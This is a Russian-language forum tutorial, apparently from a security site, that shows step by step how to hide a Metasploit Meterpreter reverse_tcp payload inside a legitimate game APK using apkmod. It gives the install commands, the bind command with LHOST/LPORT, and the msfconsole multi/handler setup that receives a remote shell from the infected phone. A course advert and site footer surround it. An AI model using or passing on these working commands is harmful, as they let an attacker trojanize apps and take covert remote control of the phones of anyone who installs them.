• 🚨 24 часа до повышения цены на курс «Пентест Active Directory: от теории к практике» от Академии Кодебай

    🔍 Изучите реальные техники атак на инфраструктуру Active Directory: от первоначального доступа до полной компрометации.
    🛠️ Освойте инструменты, такие как BloodHound, Mimikatz, CrackMapExec и другие.
    🧪 Пройдите практические лабораторные работы, имитирующие реальные сценарии атак.
    🧠 Получите знания, которые помогут вам стать востребованным специалистом в области информационной безопасности.

    Последний день записи в текущий поток по старой цене Подробнее о курсе ...

Статья Биндим к .apk файлу метерпретер при помощи apkmod

Всем привет! в данной статье я расскажу как забиндить к .apk файлу метерпретер при помощи apkmod


Нам понадобится: .apk к которому клеем, metasploit и apkmod.


Установка apkmod:
Сначало нужно скачать установщик.
Код:
wget https://raw.githubusercontent.com/Hax4us/Apkmod/master/setup.sh
Снимок экрана_2020-10-30_06-11-46.png


Затем пишем
Код:
sh setup.sh
ждем окончания установки


Бинд:

Для примера я буду использовать игру Geometry Dash(для удобности переименовал в Geome.apk)
Код:
apkmod -b Geome.apk -o GeometryDash.apk LHOST=192.168.100.3 LPORT=4444
-b : файл к которому клеем пейлод
-o : выходной файл с пейлодом

Снимок экрана_2020-10-30_06-20-02.png

Снимок экрана_2020-10-30_06-32-06.png
P.S: это зависит от apk файла к которому биндите


Теперь переходим к Metasploit:
Код:
msfconsole
Используем multi/handler:
Код:
use exploit/multi/handler
Ставим пейлод под Android:
Код:
set payload android/meterpreter/reverse_tcp
Прописываем наш IP и Порт:
Код:
set LHOST 192.168.100.3
Код:
set LPORT 4444
Запускаем:
Код:
exploit
Снимок экрана_2020-10-30_06-47-58.png


Теперь скидываем себе на телефон и смотрим на результат:
Снимок экрана_2020-10-30_06-55-06.png



На этом моя статья заканчивается.
Всем пока!
 
Последнее редактирование:
  • Нравится
Реакции: Tenta
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

Курс AD